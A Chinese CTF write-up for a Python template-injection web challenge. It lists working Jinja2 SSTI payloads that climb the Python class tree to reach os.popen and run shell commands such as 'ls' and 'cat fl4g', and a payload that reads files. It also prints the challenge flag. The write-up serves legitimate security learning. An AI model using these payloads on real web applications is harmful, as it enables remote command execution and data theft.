当前位置: 首页 > news >正文

攻防世界-Web-Web_python_template_injection

news 2025/10/1 7:25:12

知识点

1.SSTI模版注入

步骤

1.检测注入,发现存在

2.查看所有基类

''.__class__.__mro__[2].__subclasses__()

发现有<type 'file'>,<class 'warnings.catch_warnings'>,<class 'site._Printer'>等方法

payload

1.利用<class 'site._Printer'>,在第71位
列出文件和目录
{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}
或者使用listdir
{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}
读取
{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('cat fl4g').read()}}

2.利用<class 'warnings.catch_warnings'>,在第59位
列出
{{[].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].os.popen('ls').read()}}
读取
{{[].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].os.popen('cat flag').read()}}

3.利用<class 'warnings.catch_warnings'>,在第59位
利用<type 'file'>,只能用于读取文件内容
{{[].__class__.__base__.__subclasses__()[40]('fl4g').read()}}

flag:ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}

http://www.dtcms.com/a/426845.html

相关文章:

  • seo站内优化公司河北邯郸seo网站建设网站优化
  • wordpress网站插件优秀校园网站
  • Hibernate批量查询方法全面解析
  • 深度解析 ChatGPT 和 Claude 的记忆机制
  • 994. 腐烂的橘子,207. 课程表, 208.实现 Trie (前缀树)
  • 有趣的化学元素
  • 深圳网站建设者西安广告公司
  • READ_ONCE、smp_store_release在io_uring中实例分析
  • C/C++数据结构之用数组实现栈
  • Linux timekeeping
  • macOS 下安装 zsh、zsh-syntax-highlighting、powerlevel9k、nerd-font
  • CarveMe:代谢模型构建
  • windows显示驱动开发-调试间接显示驱动程序(二)
  • 企业平台网站建设制作一个网站平台
  • LinuxC++——etcd分布式键值存储系统入门
  • 使用arcgis提取评价指标时,导出数据是负数-9999
  • VUE3+element plus 实现表格行合并
  • LinuxC++——etcd分布式键值存储系统API(libetcd-cpp-api3)下载与二次封装
  • Electron vue项目 打包 exe文件2
  • 【开题答辩全过程】以 springboot高校创新创业课程体系的设计与实现为例,包含答辩的问题和答案
  • package.json详解
  • iOS 应用上架全流程解析,苹果应用发布步骤、ipa 上传工具、TestFlight 测试与 App Store 审核经验
  • QGIS + ArcGIS Pro 下载常见卫星影像及 ESRI Wayback 历史影像
  • Hexo搭建/部署个人博客教程
  • 中山 网站建设发布平台是什么
  • Qt操作Windows平板上摄像头
  • 外贸建站哪好asp网站打开很慢的原因
  • rknn yolo11 推理
  • 虚幻基础:容器
  • 开发环境windows安装oracle 19c并连接数据库